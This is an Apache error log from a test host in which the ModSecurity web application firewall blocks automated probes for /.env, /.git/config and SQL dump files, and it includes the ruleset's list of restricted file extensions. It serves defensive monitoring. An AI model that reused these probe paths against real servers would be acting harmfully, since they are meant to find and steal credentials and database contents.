[Wed Jul 30 20:14:59.412552 2025] [:error] [pid 1565747] [client 143.244.168.161:46506] [client 143.244.168.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIphI0-7kYLRyZuY-tPHrwAAAAM"]
[Wed Jul 30 20:14:59.688833 2025] [:error] [pid 1572606] [client 143.244.168.161:46514] [client 143.244.168.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphI_Vy0Jq6c4BDC1WHKwAAAAo"]
[Wed Jul 30 20:14:59.689044 2025] [:error] [pid 1572606] [client 143.244.168.161:46514] [client 143.244.168.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphI_Vy0Jq6c4BDC1WHKwAAAAo"]
[Wed Jul 30 20:14:59.689214 2025] [:error] [pid 1572606] [client 143.244.168.161:46514] [client 143.244.168.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphI_Vy0Jq6c4BDC1WHKwAAAAo"]
[Wed Jul 30 20:15:04.663269 2025] [:error] [pid 1576471] [client 93.123.109.64:48532] [client 93.123.109.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphKOaG-8e7YfmJ05OmAQAAAAY"]
[Wed Jul 30 20:15:04.663534 2025] [:error] [pid 1576471] [client 93.123.109.64:48532] [client 93.123.109.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphKOaG-8e7YfmJ05OmAQAAAAY"]
[Wed Jul 30 20:15:04.663690 2025] [:error] [pid 1576471] [client 93.123.109.64:48532] [client 93.123.109.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphKOaG-8e7YfmJ05OmAQAAAAY"]
[Wed Jul 30 20:15:05.315218 2025] [:error] [pid 1576484] [client 93.123.109.64:48538] [client 93.123.109.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphKQSAY3qBIoISB5HW9gAAAA8"]
[Wed Jul 30 20:15:05.315466 2025] [:error] [pid 1576484] [client 93.123.109.64:48538] [client 93.123.109.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphKQSAY3qBIoISB5HW9gAAAA8"]
[Wed Jul 30 20:15:05.315634 2025] [:error] [pid 1576484] [client 93.123.109.64:48538] [client 93.123.109.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphKQSAY3qBIoISB5HW9gAAAA8"]
[Wed Jul 30 20:16:11.940345 2025] [:error] [pid 1584505] [client 195.178.110.68:58150] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphaxJFqdjgwJRQzrx8OgAAAAQ"]
[Wed Jul 30 20:16:11.940569 2025] [:error] [pid 1584505] [client 195.178.110.68:58150] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphaxJFqdjgwJRQzrx8OgAAAAQ"]
[Wed Jul 30 20:16:11.940768 2025] [:error] [pid 1584505] [client 195.178.110.68:58150] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphaxJFqdjgwJRQzrx8OgAAAAQ"]
[Wed Jul 30 20:16:20.050229 2025] [:error] [pid 1576471] [client 93.123.109.64:44572] [client 93.123.109.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphdOaG-8e7YfmJ05OmBAAAAAY"]
[Wed Jul 30 20:16:20.050498 2025] [:error] [pid 1576471] [client 93.123.109.64:44572] [client 93.123.109.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphdOaG-8e7YfmJ05OmBAAAAAY"]
[Wed Jul 30 20:16:20.050660 2025] [:error] [pid 1576471] [client 93.123.109.64:44572] [client 93.123.109.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphdOaG-8e7YfmJ05OmBAAAAAY"]
[Wed Jul 30 20:16:22.531002 2025] [:error] [pid 1584505] [client 195.178.110.68:64089] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphdhJFqdjgwJRQzrx8OwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:16:22.531246 2025] [:error] [pid 1584505] [client 195.178.110.68:64089] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphdhJFqdjgwJRQzrx8OwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:16:22.531434 2025] [:error] [pid 1584505] [client 195.178.110.68:64089] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphdhJFqdjgwJRQzrx8OwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:16:26.522781 2025] [:error] [pid 1567423] [client 195.178.110.68:51802] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphejf8NbEoLJ44iDeRFgAAAAk"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:16:26.523031 2025] [:error] [pid 1567423] [client 195.178.110.68:51802] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphejf8NbEoLJ44iDeRFgAAAAk"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:16:26.523201 2025] [:error] [pid 1567423] [client 195.178.110.68:51802] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphejf8NbEoLJ44iDeRFgAAAAk"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:16:33.946122 2025] [:error] [pid 1584503] [client 93.123.109.64:33350] [client 93.123.109.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphgQlQatcaJNnppviqWwAAAAA"]
[Wed Jul 30 20:16:33.946372 2025] [:error] [pid 1584503] [client 93.123.109.64:33350] [client 93.123.109.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphgQlQatcaJNnppviqWwAAAAA"]
[Wed Jul 30 20:16:33.946529 2025] [:error] [pid 1584503] [client 93.123.109.64:33350] [client 93.123.109.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphgQlQatcaJNnppviqWwAAAAA"]
[Thu Jul 31 05:37:59.264848 2025] [:error] [pid 1590724] [client 185.177.72.24:59934] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIrlF6pSeJlNlYdcH3tBQwAAAAQ"]
[Thu Jul 31 05:37:59.265137 2025] [:error] [pid 1590724] [client 185.177.72.24:59934] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIrlF6pSeJlNlYdcH3tBQwAAAAQ"]
[Thu Jul 31 05:37:59.265327 2025] [:error] [pid 1590724] [client 185.177.72.24:59934] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIrlF6pSeJlNlYdcH3tBQwAAAAQ"]
[Thu Jul 31 07:11:22.648275 2025] [:error] [pid 1592149] [client 194.163.152.77:35230] [client 194.163.152.77] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIr6-mFBPwXgSYxFRsaiGwAAAAc"]
[Thu Jul 31 07:11:22.648540 2025] [:error] [pid 1592149] [client 194.163.152.77:35230] [client 194.163.152.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIr6-mFBPwXgSYxFRsaiGwAAAAc"]
[Thu Jul 31 07:11:22.648687 2025] [:error] [pid 1592149] [client 194.163.152.77:35230] [client 194.163.152.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIr6-mFBPwXgSYxFRsaiGwAAAAc"]
[Thu Jul 31 07:52:15.400930 2025] [:error] [pid 1590722] [client 213.209.143.116:60170] [client 213.209.143.116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIsEj2iVPVgtcxTHeBh0HgAAAAI"]
[Thu Jul 31 07:52:15.401144 2025] [:error] [pid 1590722] [client 213.209.143.116:60170] [client 213.209.143.116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIsEj2iVPVgtcxTHeBh0HgAAAAI"]
[Thu Jul 31 07:52:15.401302 2025] [:error] [pid 1590722] [client 213.209.143.116:60170] [client 213.209.143.116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIsEj2iVPVgtcxTHeBh0HgAAAAI"]
[Thu Jul 31 09:07:28.557393 2025] [:error] [pid 1590754] [client 213.232.87.234:57655] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database_backup.sql"] [unique_id "aIsWMCiYD7R6T6im77vdTwAAAAU"]
[Thu Jul 31 09:07:28.557713 2025] [:error] [pid 1590754] [client 213.232.87.234:57655] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database_backup.sql"] [unique_id "aIsWMCiYD7R6T6im77vdTwAAAAU"]
[Thu Jul 31 09:07:28.557874 2025] [:error] [pid 1590754] [client 213.232.87.234:57655] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database_backup.sql"] [unique_id "aIsWMCiYD7R6T6im77vdTwAAAAU"]
[Thu Jul 31 09:07:28.559129 2025] [:error] [pid 1590723] [client 213.232.87.234:38715] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aIsWMDDZocKijFEs7hEI8AAAAAM"]
